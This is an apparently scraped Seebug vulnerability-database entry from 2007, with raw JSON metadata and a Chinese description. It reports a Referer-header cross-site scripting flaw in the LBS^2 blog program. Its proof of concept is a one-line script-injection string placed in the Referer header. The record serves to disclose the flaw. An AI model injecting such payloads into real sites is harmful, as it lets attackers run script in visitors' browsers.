Description
LBS^2是由SIC开发一个单用户的Blog程序,因其的安全性和程序的执行快速,被很多的Bloger爱好,我也是其中一员,在使用的过程中,发现其安全性真的很好,不过有一个小Bug还是出现了。
LBS^2
<a href="http://www.voidland.com/" target="_blank">http://www.voidland.com/</a>
{"href": "https://www.seebug.org/vuldb/ssvid-1378", "status": "poc,details", "bulletinFamily": "exploit", "modified": "2007-02-07T00:00:00", "title": "LBS 2 \u8de8\u7ad9\u6f0f\u6d1e[Referer ]", "cvss": {"vector": "NONE", "score": 0.0}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-1378", "cvelist": [], "description": "LBS^2\u662f\u7531SIC\u5f00\u53d1\u4e00\u4e2a\u5355\u7528\u6237\u7684Blog\u7a0b\u5e8f\uff0c\u56e0\u5176\u7684\u5b89\u5168\u6027\u548c\u7a0b\u5e8f\u7684\u6267\u884c\u5feb\u901f\uff0c\u88ab\u5f88\u591a\u7684Bloger\u7231\u597d\uff0c\u6211\u4e5f\u662f\u5176\u4e2d\u4e00\u5458\uff0c\u5728\u4f7f\u7528\u7684\u8fc7\u7a0b\u4e2d\uff0c\u53d1\u73b0\u5176\u5b89\u5168\u6027\u771f\u7684\u5f88\u597d\uff0c\u4e0d\u8fc7\u6709\u4e00\u4e2a\u5c0fBug\u8fd8\u662f\u51fa\u73b0\u4e86\u3002\r\n\r\nLBS^2 \r\n <a href=\"http://www.voidland.com/\" target=\"_blank\">http://www.voidland.com/</a>", "viewCount": 5, "published": "2007-02-07T00:00:00", "sourceData": "\n \u7528 minibrowser \u6d4f\u89c8\u7f51\u7ad9\r\n\u5728 Referer \u90a3\u91cc\u5199\u4e0a XSS \u8bed\u53e5\r\n"><script>alert("")</script><a href="\n ", "id": "SSV:1378", "enchantments_done": [], "type": "seebug", "lastseen": "2017-11-19T22:10:34", "reporter": "Root", "enchantments": {"score": {"value": -0.0, "vector": "NONE"}, "dependencies": {}, "backreferences": {}, "exploitation": null, "vulnersScore": -0.0}, "references": [], "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645263559, "score": 1659785532, "epss": 1678851499}}
{}
LBS 2 跨站漏洞[Referer ]